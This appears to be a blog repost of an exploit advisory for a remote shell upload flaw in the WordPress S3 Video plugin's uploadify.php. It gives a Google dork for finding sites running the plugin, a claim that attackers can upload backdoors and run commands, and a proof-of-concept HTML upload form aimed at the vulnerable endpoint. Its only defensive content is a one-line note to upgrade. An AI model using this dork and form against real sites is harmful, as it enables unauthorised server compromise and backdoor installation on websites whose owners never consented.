Halaman

WordPress Plugins S3 Video Remote Shell Upload

Jumat, 11 Desember 2015

#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulrnerability : 
/wp-content/plugins/s3-video/includes/uploadify.php

Description : 
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:
Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>


Shell Path : Here !!


Tidak ada komentar:

Posting Komentar